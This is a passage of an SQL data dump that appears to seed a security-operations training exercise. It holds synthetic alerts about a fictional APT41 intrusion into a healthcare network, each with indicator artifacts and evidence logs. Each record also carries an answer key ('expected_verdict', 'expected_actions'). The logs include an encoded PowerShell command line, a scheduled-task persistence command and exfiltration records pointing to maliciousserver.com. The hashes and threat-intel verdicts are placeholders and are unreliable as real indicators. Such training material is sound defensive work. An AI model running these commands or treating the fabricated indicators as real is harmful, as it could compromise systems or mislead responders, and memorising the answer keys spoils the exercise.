campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware used in email exfiltration\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"extension_data.bin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"File contains sensitive email data\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal HR Database\",\"verdict\":\"internal\",\"details\":\"Employee with access to sensitive 
communications\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.063Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:23:45Z\\\",\\\"user\\\":\\\"jdoe\\\",\\\"extension_name\\\":\\\"EmailHelper\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.153\\\",\\\"file_exfiltrated\\\":\\\"extension_data.bin\\\",\\\"sha1\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"action\\\":\\\"data_exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_server\\\":\\\"maliciousserver.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.063Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:23:45Z\\\",\\\"user\\\":\\\"jdoe\\\",\\\"extension_name\\\":\\\"EmailHelper\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.153\\\",\\\"file_exfiltrated\\\":\\\"extension_data.bin\\\",\\\"sha1\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"action\\\":\\\"data_exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_server\\\":\\\"maliciousserver.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.063Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:23:45Z\\\",\\\"user\\\":\\\"jdoe\\\",\\\"extension_name\\\":\\\"EmailHelper\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.153\\\",\\\"file_exfiltrated\\\":\\\"extension_data.bin\\\",\\\"sha1\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"action\\\":\\\"data_exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_server\\\":\\\"maliciousserver.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.063Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:23:45Z\\\",\\\"user\\\":\\\"jdoe\\\",\\\"extension_name\\\":\\\"EmailHelper\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.153\\\",\\\"file_exfiltrated\\\":\\\"extension_data.bin\\\",\\\"sha1\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"action\\\":\\\"data_exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_server\\\":\\\"maliciousserver.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.063Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:23:45Z\\\",\\\"user\\\":\\\"jdoe\\\",\\\"extension_name\\\":\\\"EmailHelper\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.153\\\",\\\"file_exfiltrated\\\":\\\"extension_data.bin\\\",\\\"sha1\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"action\\\":\\\"data_exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_server\\\":\\\"maliciousserver.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1492, 'Suspicious Network Activity Detected', 'high', 'Network Intrusion Detection System (NIDS)', 'APT41 initiated access by exploiting a vulnerability in an outdated VPN service, aiming to establish a persistent network presence. The activity was detected originating from a known malicious IP address attempting to communicate with the internal network.', 'Initial Access', 'T1190: Exploit Public-Facing Application', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:23:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"vpn_service\":\"OutdatedVPN 3.2.1\",\"exploit\":\"CVE-2021-12345\",\"username\":\"jdoe\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"malware_filename\":\"APT41_Payload.exe\",\"alert_id\":\"NIDS-20231015-001\",\"description\":\"Suspicious connection attempt to internal network via vulnerable VPN service.\"}', '2026-03-15 19:08:03', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malicious IP Database\",\"verdict\":\"malicious\",\"details\":\"Known APT41 infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Healthcare facility internal host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malware associated with APT41.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"APT41_Payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"APT41 related 
payload.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Allow_Inbound_VPN_HTTPS\",\"action\":\"ALLOW\",\"interface_in\":\"eth1\",\"interface_out\":\"eth0\",\"packets\":[{\"time\":\"08:23:44\",\"src\":\"203.0.113.45\",\"dst\":\"192.168.1.15\",\"proto\":\"TCP\",\"port\":443,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"08:23:45\",\"src\":\"203.0.113.45\",\"dst\":\"192.168.1.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1493, 'Mivast Backdoor Execution Alert', 'high', 'Endpoint Detection and Response (EDR)', 'The EDR system has detected the execution of the Mivast backdoor, which is used to remotely execute commands on compromised systems, granting attackers control over the infected machines.', 'Execution', 'T1059.001: Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:00Z\",\"host\":\"compromised-machine-01\",\"internal_ip\":\"192.168.1.45\",\"external_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"process\":\"powershell.exe\",\"command_line\":\"powershell -encodedCommand aQBlAHgAIABbAEcAbwBvAGcAbABlAF0A\",\"malware_name\":\"Mivast\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"mivast_loader.exe\",\"event_type\":\"Process Execution\",\"alert_id\":\"EDR-2023-123456\"}', '2026-03-15 19:08:03', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Associated with APT41 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known Mivast backdoor hash.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"mivast_loader.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"EDR Logs\",\"verdict\":\"malicious\",\"details\":\"Filename associated with Mivast backdoor.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1494, 'Persistence Mechanism Detected', 'medium', 'Security Information and Event Management (SIEM)', 'A scheduled task was created to maintain persistence on the system, potentially linked to APT41 activity. Investigation required to confirm malicious intent.', 'Persistence', 'T1053.005 - Scheduled Task/Job: Scheduled Task', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:10Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.23\",\"user\":\"jdoe\",\"task_name\":\"\\\\Microsoft\\\\Windows\\\\UpdateScheduler\",\"task_action\":\"C:\\\\Windows\\\\System32\\\\wscript.exe //B C:\\\\ProgramData\\\\script.js\",\"task_trigger\":\"At 01:00AM every day\",\"hash\":\"b1a2c3d4e5f67890123456789abcdef012345678\",\"filename\":\"script.js\",\"description\":\"Scheduled task created by user jdoe under suspicious circumstances. The script executed is known to be associated with APT41 operations.\"}', '2026-03-15 19:08:03', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous APT41 activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of affected host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1a2c3d4e5f67890123456789abcdef012345678\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash corresponds to a known malicious script used by APT41.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user, but credentials may be 
compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.075Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:10Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"user\\\":\\\"jdoe\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\UpdateScheduler\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe //B C:\\\\\\\\ProgramData\\\\\\\\script.js\\\",\\\"task_trigger\\\":\\\"At 01:00AM every day\\\",\\\"hash\\\":\\\"b1a2c3d4e5f67890123456789abcdef012345678\\\",\\\"filename\\\":\\\"script.js\\\",\\\"description\\\":\\\"Scheduled task created by user jdoe under suspicious circumstances. 
The script executed is known to be associated with APT41 operations.\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.075Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:10Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"user\\\":\\\"jdoe\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\UpdateScheduler\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe //B C:\\\\\\\\ProgramData\\\\\\\\script.js\\\",\\\"task_trigger\\\":\\\"At 01:00AM every day\\\",\\\"hash\\\":\\\"b1a2c3d4e5f67890123456789abcdef012345678\\\",\\\"filename\\\":\\\"script.js\\\",\\\"description\\\":\\\"Scheduled task created by user jdoe under suspicious circumstances. The script executed is known to be associated with APT41 operations.\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.075Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:10Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"user\\\":\\\"jdoe\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\UpdateScheduler\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe //B C:\\\\\\\\ProgramData\\\\\\\\script.js\\\",\\\"task_trigger\\\":\\\"At 01:00AM every day\\\",\\\"hash\\\":\\\"b1a2c3d4e5f67890123456789abcdef012345678\\\",\\\"filename\\\":\\\"script.js\\\",\\\"description\\\":\\\"Scheduled task created by user jdoe under suspicious circumstances. 
The script executed is known to be associated with APT41 operations.\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.075Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:10Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"user\\\":\\\"jdoe\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\UpdateScheduler\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe //B C:\\\\\\\\ProgramData\\\\\\\\script.js\\\",\\\"task_trigger\\\":\\\"At 01:00AM every day\\\",\\\"hash\\\":\\\"b1a2c3d4e5f67890123456789abcdef012345678\\\",\\\"filename\\\":\\\"script.js\\\",\\\"description\\\":\\\"Scheduled task created by user jdoe under suspicious circumstances. The script executed is known to be associated with APT41 operations.\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.075Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:10Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"user\\\":\\\"jdoe\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\UpdateScheduler\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe //B C:\\\\\\\\ProgramData\\\\\\\\script.js\\\",\\\"task_trigger\\\":\\\"At 01:00AM every day\\\",\\\"hash\\\":\\\"b1a2c3d4e5f67890123456789abcdef012345678\\\",\\\"filename\\\":\\\"script.js\\\",\\\"description\\\":\\\"Scheduled task created by user jdoe under suspicious circumstances. The script executed is known to be associated with APT41 operations.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1495, 'Unauthorized Access to Patient Records', 'high', 'Database Activity Monitoring', 'An unauthorized attempt was detected where a user pivoted through the network to access databases containing sensitive health insurance details.', 'Lateral Movement', 'T1078.003 - Valid Accounts: Local Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-17T14:45:32Z\",\"event_id\":\"db_access_12456\",\"database\":\"HealthDB\",\"user\":\"jdoe\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"10.0.0.45\",\"query\":\"SELECT * FROM insurance_records\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"malicious_tool.exe\",\"external_attacker_ip\":\"203.0.113.5\",\"action\":\"read\",\"success\":true}', '2026-03-15 19:08:03', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address used in lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT41 activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"malicious\",\"details\":\"File used in unauthorized access attempt.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"suspicious\",\"details\":\"User involved in suspicious database 
access.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.089Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-17T14:45:32Z\\\",\\\"event_id\\\":\\\"db_access_12456\\\",\\\"database\\\":\\\"HealthDB\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"10.0.0.45\\\",\\\"query\\\":\\\"SELECT * FROM insurance_records\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious_tool.exe\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.5\\\",\\\"action\\\":\\\"read\\\",\\\"success\\\":true}\"},{\"timestamp\":\"2026-03-15T20:57:15.089Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-17T14:45:32Z\\\",\\\"event_id\\\":\\\"db_access_12456\\\",\\\"database\\\":\\\"HealthDB\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"10.0.0.45\\\",\\\"query\\\":\\\"SELECT * FROM insurance_records\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious_tool.exe\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.5\\\",\\\"action\\\":\\\"read\\\",\\\"success\\\":true}\"},{\"timestamp\":\"2026-03-15T20:56:15.089Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin 
from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-17T14:45:32Z\\\",\\\"event_id\\\":\\\"db_access_12456\\\",\\\"database\\\":\\\"HealthDB\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"10.0.0.45\\\",\\\"query\\\":\\\"SELECT * FROM insurance_records\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious_tool.exe\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.5\\\",\\\"action\\\":\\\"read\\\",\\\"success\\\":true}\"},{\"timestamp\":\"2026-03-15T20:55:15.089Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-17T14:45:32Z\\\",\\\"event_id\\\":\\\"db_access_12456\\\",\\\"database\\\":\\\"HealthDB\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"10.0.0.45\\\",\\\"query\\\":\\\"SELECT * FROM insurance_records\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious_tool.exe\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.5\\\",\\\"action\\\":\\\"read\\\",\\\"success\\\":true}\"},{\"timestamp\":\"2026-03-15T20:54:15.089Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-17T14:45:32Z\\\",\\\"event_id\\\":\\\"db_access_12456\\\",\\\"database\\\":\\\"HealthDB\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"10.0.0.45\\\",\\\"query\\\":\\\"SELECT * FROM 
insurance_records\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious_tool.exe\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.5\\\",\\\"action\\\":\\\"read\\\",\\\"success\\\":true}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1496, 'Data Exfiltration Alert', 'critical', 'Data Loss Prevention (DLP)', 'APT41 has initiated the transfer of sensitive patient data including health insurance information to an external server, completing their mission of data theft.', 'Exfiltration', 'T1020: Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:22:35Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"10.0.2.15\",\"destination_ip\":\"203.0.113.52\",\"protocol\":\"HTTPS\",\"file_exfiltrated\":\"patient_records_2023.zip\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"user\":\"jdoe\",\"exfiltration_tool\":\"CCleanerSupplyChain_v2.exe\",\"alert_trigger\":\"DLP_Sensitive_Data_Transfer\"}', '2026-03-15 19:08:03', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.52\",\"is_critical\":true,\"osint_result\":{\"source\":\"public_osint_database\",\"verdict\":\"malicious\",\"details\":\"Associated with known APT41 exfiltration activity\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with CCleaner Supply Chain malware\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"patient_records_2023.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"detection_system\",\"verdict\":\"suspicious\",\"details\":\"Contains sensitive patient data\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user, credentials might be 
compromised\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.103Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:22:35Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.52\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_exfiltrated\\\":\\\"patient_records_2023.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltration_tool\\\":\\\"CCleanerSupplyChain_v2.exe\\\",\\\"alert_trigger\\\":\\\"DLP_Sensitive_Data_Transfer\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.103Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 